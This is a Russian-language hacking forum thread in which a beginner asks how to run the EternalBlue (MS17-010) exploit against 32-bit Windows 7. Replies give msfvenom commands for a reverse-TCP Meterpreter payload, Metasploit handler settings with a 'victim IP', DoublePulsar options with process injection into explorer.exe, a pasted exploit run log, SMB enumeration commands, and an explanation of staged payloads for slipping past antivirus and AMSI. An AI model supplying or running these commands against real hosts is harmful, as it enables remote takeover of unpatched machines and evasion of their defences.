• B правой части каждого сообщения есть стрелки и . Не стесняйтесь оценивать ответы. Чтобы автору вопроса закрыть свой тикет, надо выбрать лучший ответ. Просто нажмите значок в правой части сообщения.

Kali Linux: Eternalblue x86

Sagain2

New member
30.04.2019
4
0
BIT
0
(Ребята, только не бейте, я новичек)
Даров, хацкеры. У меня тут возник вопрос. Большая часть эксплоитов в metasploit-framework заточены под windows (7) x64
Теперь встречный вопрос, есть ли эксплоит для windows 7 x86? Пол инета облазил не нашел.
Ну или есть его заменители?
 

rdh_x

Green Team
26.03.2018
63
5
BIT
0
Генеришь нагрузку
Bash:
msfvenom -a x86 -p windows/meterpreter/reverse_tcp LHOST=192.168.X.X >> payload.exe

Далее в msfconsole
Bash:
use exploit/multi/handler
set lhost <твой ip>
set rhost <ip жертвы>
set payload windows/meterpreter/reverse_tcp
run
 

rdh_x

Green Team
26.03.2018
63
5
BIT
0
Прошу прощения, изначально подумал что неправильно понял вопрос и удалил свой правильный ответ.

Для 32-бит есть Doublepulsar, в настройках сплоита
Код:
set targetarcheticture x84
И нужно изменить processinject, попробуйте поэксперементировать с разными процессами, я пробовал explorer.exe но иногда соединение падало.
Код:
set processinject explorer.exe
Также на некоторых процессах нельзя повысить привилегии.
И соответственно вместо
Код:
set payload windows/x64/meterpreter/reverse_tcp
Нужно
Код:
set payload windows/meterpreter/reverse_tcp
 

s unity

Green Team
18.09.2019
207
26
BIT
0
Прошу прощения, изначально подумал что неправильно понял вопрос и удалил свой правильный ответ.

Для 32-бит есть Doublepulsar, в настройках сплоита
Код:
set targetarcheticture x84
И нужно изменить processinject, попробуйте поэксперементировать с разными процессами, я пробовал explorer.exe но иногда соединение падало.
Код:
set processinject explorer.exe
Также на некоторых процессах нельзя повысить привилегии.
И соответственно вместо
Код:
set payload windows/x64/meterpreter/reverse_tcp
Нужно
Код:
set payload windows/meterpreter/reverse_tcp
В мсфконсоли нет даблпульсара "из коробки". Нужно идти на гитхаб и оттуда брать. Вообще лучше загуглить куда его кидать храниться и как использовать.
 

s unity

Green Team
18.09.2019
207
26
BIT
0
Знаешь че скажу, забей КУЙ на это. Почти все пейлоды работают только в локалке. С пробросом портов за nat такоооой геморой.... что это не стоит того. Можно пробовать бомбить ТОЛЬКО по белым ип.
Но раз на то пошло, то где ты там увидел, что все идет под x64?! Наоборот x64 прям редко. Вообще этерналблю и туда и туда, просто нужно заходить в exploit и читать подробную инфу типа:
#show info
#show payloads (список нагрузок, там и х86, там и х64)
#show targets (в основном список доступных ОС)
# и так далее.. почти каждая строчка это изменяемый параметр.

Вообще советую познакомиться с SEARCHSPLOIT.
 

apache2

Green Team
26.02.2021
42
21
BIT
302
Наоборот x64 прям редко.
msf6 exploit(windows/smb/ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 192.168.56.108:4444
[*] 192.168.56.104:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.56.104:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2003 R2 3790 Service Pack 2 x86 (32-bit)
[*] 192.168.56.104:445 - Scanned 1 of 1 hosts (100% complete)
[+] 192.168.56.104:445 - The target is vulnerable.
[-] 192.168.56.104:445 - Exploit aborted due to failure: no-target: This module only supports x64 (64-bit) targets
[*] Exploit completed, but no session was created.
msf6 exploit(windows/smb/ms17_010_eternalblue) > :(
Welcome, Doublepulsar
 

B13

Заблокирован
01.01.2020
412
55
BIT
134
Если я не ошибусь то ms17-10 пофиксил ещё в 17-году и по отчётности от компании Positive Technology нахождение этой уязвимости составил 30%. На данный момент отчётность не попадалась и какова вероятность обнаружения ms17-10 сказать не могу.
 

B13

Заблокирован
01.01.2020
412
55
BIT
134
По поводу нахождения в metasploit эксплоитов под win x86 эксплоиты должны быть.
 

Rukh

Green Team
04.05.2022
18
4
BIT
8
Система наименований
Для начала имеет смысл оговорить, что msfvenom, ровно как и meterpreter, использует следующую систему наименований:

Операционка/Архитектура/payload
#т.е. например
linux/x86/shell_reverse_tcp

Для linux таргетов мы прописываем архитектуру
linux/x86/payload
или​
linux/x64/payload

Для Windows таргетов мы прописываем
windows/x64/payload
а для x86 оставляем так:​
windows/payload

Концепция ступенчатости полезной нагрузки
Далее напомню, что есть 1) бесступенчатые (Stageless) payload и 2) ступенчатые (Staged)

1) бесступенчатые:​
shell_reverse_tcp
2) ступенчатые:​
shell/reverse_tcp

1) Бесступенчатые более распространённые, они полностью автономны в том смысле, что есть один фрагмент кода, который при выполнении немедленно отправляет shell обратно на наш прослушивающий порт.
- такие payload как правило, проще в использовании и применении; однако они также более громоздки, и их легче обнаружить и удалить антивирусной программе или программе обнаружения вторжений; на windows 10 вероятность удаления 144%

2) Ступенчатые отправляются двумя частями.
a) небольшой начальный стейджер, а затем более громоздкий b)reverse shell, который загружается при активации стейджера.

Стейджер - это фрагмент кода, который выполняется непосредственно на самом сервере. Он подключается обратно на наш прослушивающий порт, но сам по себе не содержит payload.
Вместо этого stager
a) подключается на наш прослушивающий порт и​
b) использует это соединение для загрузки reverse shell
При таких обстоятельствах reverse shell выполняется напрямую, предотвращая запись на диск таргета, где его могли бы перехватить традиционные антивирусные решения.

Для Staged payloads обычно требуется специальный прослушиватель — как правило, это Metasploit multi handler (multi/handler)

Staged payloads сложнее использовать, но начальный этап намного короче и иногда пропускается малоэффективным антивирусным программным обеспечением.
Стоит упомянуть, что современные антивирусные решения также будут использовать интерфейс AMSI для обнаружения reverse shell, когда она загружается в память c помощью stager, что делает staged payloads менее эффективной.

Наглядный пример:
1) windows/x64/meterpreter_reverse_tcp
1) windows/x64/meterpreter/reverse_tcp


Теперь в kali можем ввести команду msfvenom --list payloads
Будет выведен список доступных payload. Для поиска нужного можете использовать grep, например:

1651752006241.png


ETERNALBLUE ms17-010

Разберём конкретно ms17_010_eternalblue
Для использования данного эксплойта понадобятся открытые порты:
135 msrpc​
139 netbios-ssn​
445 microsoft-SMB​
1651756398640.png
Для того, чтобы не пинать metasploit и "такой-сякой" kali из-за того, что эксплойт не работает, найдите эти порты, удостоверьтесь, что они открыты. Инструментов куча, проcто перечислю ниже варианты:

Bash:
#Metasploit SMB Auxiliary Module
msf> use auxiliary/scanner/smb/smb_version
msf> set rhost 10.10.1.1
msf> run
Bash:
#Enumeration
nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.1.1

enum4linux -a 10.10.1.1
#при наличии логина/пароля
enum4linux -a -u user -p password 10.10.1.1
Bash:
#List available shares
smbclient -N -L //10.10.1.1
Bash:
#Rpc enumeration
rpcdump.py 10.10.1.1
samrdump.py 10.10.1.1
nmap -sV --script=msrpc-enum 10.10.1.1

Выбрав соответствующий эксплойт exploit/windows/smb/ms17_010_eternalblue
по дефолту будет назначен следующий payload windows/x64/shell/reverse_tcp

Вы можете посмотртеть всю информацию об эксплойте, например:
Bash:
show targets
show payloads
show evasion

И станет очевидно, например, что конкретно данный эксплойт могёт x64 начиная с win7.
Соответственно для всего прочего нужны другие модули и инструменты.

1651755603329.png

1651755677624.png


Конечно, если мы будем говорить в целом о скане хоста на уязвимости или всей сети, сети с подсетями и т.д. существует соответствующие инструменты.
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!